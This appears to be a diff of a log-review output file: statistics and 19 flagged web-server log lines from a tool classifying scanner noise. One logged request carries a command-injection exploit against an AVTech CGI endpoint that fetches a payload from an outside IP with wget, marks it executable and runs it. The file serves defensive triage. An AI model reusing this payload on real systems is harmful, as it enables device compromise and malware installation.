9b · November 8, 2018 20:03
diff --git a/log-review.txt b/log-review.txt
 {
  'statistics': {
    'noise': 264,
    'ips_processed': 283,
    'duplicate_entries': 4609,
    'money_saved': '$179.17',
    'duplicate_ratio': 94.0,
    'noise_ratio': 93.0,
    'time_saved': '8:48:00',
    'interest': 19,
    'lines_processed': 4892
  },
  'flagged': [{
    'code': '0x08',
    'ip': '43.251.16.253',
    'noise': False,
    'code_message': 'Code message unknown: 0x08',
    'log_line': '43.251.16.253 - - [28/Oct/2018:21:41:09 +0000] "PROPFIND / HTTP/1.1" 302 507 "-" "-"\n'
  }, {
    'code': '0x00',
    'ip': '151.52.18.121',
    'noise': False,
    'code_message': 'IP has never been observed scanning the Internet',
    'log_line': '151.52.18.121 - - [29/Oct/2018:16:52:04 +0000] "GET / HTTP/1.1" 302 491 "-" "-"\n'
  }, {
    'code': '0x00',
    'ip': '93.229.192.199',
    'noise': False,
    'code_message': 'IP has never been observed scanning the Internet',
    'log_line': '93.229.192.199 - - [30/Oct/2018:06:48:35 +0000] "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin%20;XmlAp%20r%20Account.User1.Password%3E$(cd%20/tmp;%20wget%20http://104.244.76.210/avtech%20-O%20darkxo;%20chmod%20777%20darkxo;%20sh%20darkxo)&password=admin HTTP/1.1" 400 0 "-" "Sefa"\n'
  }, {
    'code': '0x08',
    'ip': '41.73.228.160',
    'noise': False,
    'code_message': 'Code message unknown: 0x08',
    'log_line': '41.73.228.160 - - [30/Oct/2018:11:46:38 +0000] "GET / HTTP/1.1" 302 491 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"\n'
  }, {
    'code': '0x00',
    'ip': '201.253.109.30',
    'noise': False,
    'code_message': 'IP has never been observed scanning the Internet',
    'log_line': '201.253.109.30 - - [31/Oct/2018:07:28:22 +0000] "GET /wp-login.php HTTP/1.1" 302 580 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1"\n'
  }, {
    'code': '0x00',
    'ip': '138.197.15.168',
    'noise': False,
    'code_message': 'IP has never been observed scanning the Internet',
    'log_line': '138.197.15.168 - - [31/Oct/2018:15:16:53 +0000] "HEAD / HTTP/1.1" 302 197 "http://www.netcraft.com/survey/" "Mozilla/4.0 (compatible; Netcraft Web Server Survey)"\n'
  }, {
    'code': '0x00',
    'ip': '188.158.110.52',
    'noise': False,
    'code_message': 'IP has never been observed scanning the Internet',
    'log_line': '188.158.110.52 - - [31/Oct/2018:20:02:05 +0000] "GET / HTTP/1.1" 302 491 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"\n'
  }, {
    'code': '0x00',
    'ip': '84.188.73.252',
    'noise': False,
    'code_message': 'IP has never been observed scanning the Internet',
    'log_line': '84.188.73.252 - - [31/Oct/2018:21:28:02 +0000] "HEAD http://54.70.60.202:80/phpmyadmin/ HTTP/1.1" 302 245 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36"\n'
  }, {
    'code': '0x00',
    'ip': '125.160.45.188',
    'noise': False,
    'code_message': 'IP has never been observed scanning the Internet',
    'log_line': '125.160.45.188 - - [31/Oct/2018:23:06:52 +0000] "GET / HTTP/1.1" 302 491 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"\n'
  }, {
    'code': '0x00',
    'ip': '151.52.19.187',
    'noise': False,
    'code_message': 'IP has never been observed scanning the Internet',
    'log_line': '151.52.19.187 - - [31/Oct/2018:23:32:28 +0000] "GET / HTTP/1.1" 302 491 "-" "-"\n'
  }, {
    'code': '0x00',
    'ip': '54.36.150.76',
    'noise': False,
    'code_message': 'IP has never been observed scanning the Internet',
    'log_line': '54.36.150.76 - - [01/Nov/2018:05:53:16 +0000] "GET /robots.txt HTTP/1.1" 404 2596 "-" "Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)"\n'
  }, {
    'code': '0x00',
    'ip': '54.36.150.167',
    'noise': False,
    'code_message': 'IP has never been observed scanning the Internet',
    'log_line': '54.36.150.167 - - [01/Nov/2018:05:53:16 +0000] "GET / HTTP/1.1" 200 7775 "-" "Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)"\n'
  }, {
    'code': '0x00',
    'ip': '82.58.159.157',
    'noise': False,
    'code_message': 'IP has never been observed scanning the Internet',
    'log_line': '82.58.159.157 - - [02/Nov/2018:03:40:07 +0000] "GET / HTTP/1.1" 302 491 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"\n'
  }, {
    'code': '0x00',
    'ip': '151.52.31.246',
    'noise': False,
    'code_message': 'IP has never been observed scanning the Internet',
    'log_line': '151.52.31.246 - - [02/Nov/2018:11:43:28 +0000] "GET / HTTP/1.1" 302 491 "-" "-"\n'
  }, {
    'code': '0x00',
    'ip': '73.27.15.168',
    'noise': False,
    'code_message': 'IP has never been observed scanning the Internet',
    'log_line': '73.27.15.168 - - [03/Nov/2018:19:00:23 +0000] "GET / HTTP/1.1" 302 491 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"\n'
  }, {
    'code': '0x08',
    'ip': '202.182.133.2',
    'noise': False,
    'code_message': 'Code message unknown: 0x08',
    'log_line': '202.182.133.2 - - [03/Nov/2018:23:25:08 +0000] "GET / HTTP/1.1" 302 491 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"\n'
  }, {
    'code': '0x00',
    'ip': '123.207.171.250',
    'noise': False,
    'code_message': 'IP has never been observed scanning the Internet',
    'log_line': '123.207.171.250 - - [04/Nov/2018:02:48:42 +0000] "PROPFIND / HTTP/1.1" 302 507 "-" "-"\n'
  }, {
    'code': '0x00',
    'ip': '77.234.68.136',
    'noise': False,
    'code_message': 'IP has never been observed scanning the Internet',
    'log_line': '77.234.68.136 - - [04/Nov/2018:21:56:50 +0000] "GET / HTTP/1.1" 302 556 "https://brandnewblogs.com/blogs-july-2018/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0"\n'
  }, {
    'code': '0x00',
    'ip': '117.50.73.19',
    'noise': False,
    'code_message': 'IP has never been observed scanning the Internet',
    'log_line': '117.50.73.19 - - [04/Nov/2018:22:01:51 +0000] "PROPFIND / HTTP/1.1" 302 507 "-" "-"\n'
  }]
 }
	{
	'statistics': {
	'noise': 264,
	'ips_processed': 283,
	'duplicate_entries': 4609,
	'money_saved': '$179.17',
	'duplicate_ratio': 94.0,
	'noise_ratio': 93.0,
	'time_saved': '8:48:00',
	'interest': 19,
	'lines_processed': 4892
	},
	'flagged': [{
	'code': '0x08',
	'ip': '43.251.16.253',
	'noise': False,
	'code_message': 'Code message unknown: 0x08',
	'log_line': '43.251.16.253 - - [28/Oct/2018:21:41:09 +0000] "PROPFIND / HTTP/1.1" 302 507 "-" "-"\n'
	}, {
	'code': '0x00',
	'ip': '151.52.18.121',
	'noise': False,
	'code_message': 'IP has never been observed scanning the Internet',
	'log_line': '151.52.18.121 - - [29/Oct/2018:16:52:04 +0000] "GET / HTTP/1.1" 302 491 "-" "-"\n'
	}, {
	'code': '0x00',
	'ip': '93.229.192.199',
	'noise': False,
	'code_message': 'IP has never been observed scanning the Internet',
	'log_line': '93.229.192.199 - - [30/Oct/2018:06:48:35 +0000] "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin%20;XmlAp%20r%20Account.User1.Password%3E$(cd%20/tmp;%20wget%20http://104.244.76.210/avtech%20-O%20darkxo;%20chmod%20777%20darkxo;%20sh%20darkxo)&password=admin HTTP/1.1" 400 0 "-" "Sefa"\n'
	}, {
	'code': '0x08',
	'ip': '41.73.228.160',
	'noise': False,
	'code_message': 'Code message unknown: 0x08',
	'log_line': '41.73.228.160 - - [30/Oct/2018:11:46:38 +0000] "GET / HTTP/1.1" 302 491 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"\n'
	}, {
	'code': '0x00',
	'ip': '201.253.109.30',
	'noise': False,
	'code_message': 'IP has never been observed scanning the Internet',
	'log_line': '201.253.109.30 - - [31/Oct/2018:07:28:22 +0000] "GET /wp-login.php HTTP/1.1" 302 580 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1"\n'
	}, {
	'code': '0x00',
	'ip': '138.197.15.168',
	'noise': False,
	'code_message': 'IP has never been observed scanning the Internet',
	'log_line': '138.197.15.168 - - [31/Oct/2018:15:16:53 +0000] "HEAD / HTTP/1.1" 302 197 "http://www.netcraft.com/survey/" "Mozilla/4.0 (compatible; Netcraft Web Server Survey)"\n'
	}, {
	'code': '0x00',
	'ip': '188.158.110.52',
	'noise': False,
	'code_message': 'IP has never been observed scanning the Internet',
	'log_line': '188.158.110.52 - - [31/Oct/2018:20:02:05 +0000] "GET / HTTP/1.1" 302 491 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"\n'
	}, {
	'code': '0x00',
	'ip': '84.188.73.252',
	'noise': False,
	'code_message': 'IP has never been observed scanning the Internet',
	'log_line': '84.188.73.252 - - [31/Oct/2018:21:28:02 +0000] "HEAD http://54.70.60.202:80/phpmyadmin/ HTTP/1.1" 302 245 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36"\n'
	}, {
	'code': '0x00',
	'ip': '125.160.45.188',
	'noise': False,
	'code_message': 'IP has never been observed scanning the Internet',
	'log_line': '125.160.45.188 - - [31/Oct/2018:23:06:52 +0000] "GET / HTTP/1.1" 302 491 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"\n'
	}, {
	'code': '0x00',
	'ip': '151.52.19.187',
	'noise': False,
	'code_message': 'IP has never been observed scanning the Internet',
	'log_line': '151.52.19.187 - - [31/Oct/2018:23:32:28 +0000] "GET / HTTP/1.1" 302 491 "-" "-"\n'
	}, {
	'code': '0x00',
	'ip': '54.36.150.76',
	'noise': False,
	'code_message': 'IP has never been observed scanning the Internet',
	'log_line': '54.36.150.76 - - [01/Nov/2018:05:53:16 +0000] "GET /robots.txt HTTP/1.1" 404 2596 "-" "Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)"\n'
	}, {
	'code': '0x00',
	'ip': '54.36.150.167',
	'noise': False,
	'code_message': 'IP has never been observed scanning the Internet',
	'log_line': '54.36.150.167 - - [01/Nov/2018:05:53:16 +0000] "GET / HTTP/1.1" 200 7775 "-" "Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)"\n'
	}, {
	'code': '0x00',
	'ip': '82.58.159.157',
	'noise': False,
	'code_message': 'IP has never been observed scanning the Internet',
	'log_line': '82.58.159.157 - - [02/Nov/2018:03:40:07 +0000] "GET / HTTP/1.1" 302 491 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"\n'
	}, {
	'code': '0x00',
	'ip': '151.52.31.246',
	'noise': False,
	'code_message': 'IP has never been observed scanning the Internet',
	'log_line': '151.52.31.246 - - [02/Nov/2018:11:43:28 +0000] "GET / HTTP/1.1" 302 491 "-" "-"\n'
	}, {
	'code': '0x00',
	'ip': '73.27.15.168',
	'noise': False,
	'code_message': 'IP has never been observed scanning the Internet',
	'log_line': '73.27.15.168 - - [03/Nov/2018:19:00:23 +0000] "GET / HTTP/1.1" 302 491 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"\n'
	}, {
	'code': '0x08',
	'ip': '202.182.133.2',
	'noise': False,
	'code_message': 'Code message unknown: 0x08',
	'log_line': '202.182.133.2 - - [03/Nov/2018:23:25:08 +0000] "GET / HTTP/1.1" 302 491 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"\n'
	}, {
	'code': '0x00',
	'ip': '123.207.171.250',
	'noise': False,
	'code_message': 'IP has never been observed scanning the Internet',
	'log_line': '123.207.171.250 - - [04/Nov/2018:02:48:42 +0000] "PROPFIND / HTTP/1.1" 302 507 "-" "-"\n'
	}, {
	'code': '0x00',
	'ip': '77.234.68.136',
	'noise': False,
	'code_message': 'IP has never been observed scanning the Internet',
	'log_line': '77.234.68.136 - - [04/Nov/2018:21:56:50 +0000] "GET / HTTP/1.1" 302 556 "https://brandnewblogs.com/blogs-july-2018/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0"\n'
	}, {
	'code': '0x00',
	'ip': '117.50.73.19',
	'noise': False,
	'code_message': 'IP has never been observed scanning the Internet',
	'log_line': '117.50.73.19 - - [04/Nov/2018:22:01:51 +0000] "PROPFIND / HTTP/1.1" 302 507 "-" "-"\n'
	}]
	}